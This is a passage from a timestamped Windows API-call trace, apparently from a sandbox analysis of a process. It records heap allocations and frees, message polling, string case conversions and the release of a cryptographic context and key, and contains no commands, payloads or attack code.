Size=0x8) returned 0x24b1c48 [0165.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0165.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0165.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0165.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0165.957] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0165.957] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0165.957] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0165.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0165.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0165.957] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0165.957] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0165.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0165.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0165.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0165.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0165.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0165.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0165.958] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0165.958] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0165.958] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0165.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0165.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0165.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0165.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0165.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0165.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0165.958] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0165.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0165.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0165.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0165.958] CryptDestroyKey (hKey=0xaa55e0) returned 1 [0165.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0165.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0165.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0165.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0165.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0165.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0165.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0165.959] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0165.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0165.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0165.959] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0165.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0165.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0165.959] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0165.959] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0165.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0165.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0165.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0165.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0165.959] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0165.959] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0165.959] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0165.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0165.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0165.959] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0165.959] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0165.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0165.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0165.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0165.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0165.960] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0165.960] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0165.960] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0165.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0165.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0165.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0165.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0165.960] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0165.960] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0165.960] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0165.960] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0165.960] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0165.960] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0165.960] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0165.961] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0165.961] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0165.961] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0165.961] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0165.961] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.961] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0165.961] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.961] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0165.961] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.962] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.962] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0165.962] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.962] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0165.962] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.962] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.962] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.962] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.962] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0165.962] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0165.962] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0165.962] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0165.962] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0165.962] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.962] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0165.962] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0165.962] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0165.963] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0165.963] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0165.963] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0165.963] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0165.963] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0165.963] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0165.963] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0165.963] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.963] CryptReleaseContext (hProv=0xab2890, dwFlags=0x0) returned 1 [0165.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0165.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0165.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0165.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0165.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0165.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0165.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0165.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0165.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0165.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0165.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0165.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0165.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0165.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0165.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0165.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0165.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0165.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0165.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0165.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0165.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0165.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0165.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0165.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0165.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0165.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0165.965] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.965] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0165.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0165.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.965] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0165.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0165.965] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0165.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0165.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0165.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0165.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0165.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.965] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0165.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0165.965] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0165.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0165.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0165.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0165.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0165.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0165.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0165.966] FreeLibrary (hLibModule=0x74d40000) returned 1 [0165.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0165.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0165.966] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0165.966] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0165.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0165.966] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0165.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0165.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0165.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0165.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0165.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0165.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0165.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0165.967] CloseHandle (hObject=0x170) returned 1 [0165.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0165.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0165.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0165.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0165.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0165.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0165.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0165.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0165.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0165.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0165.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: 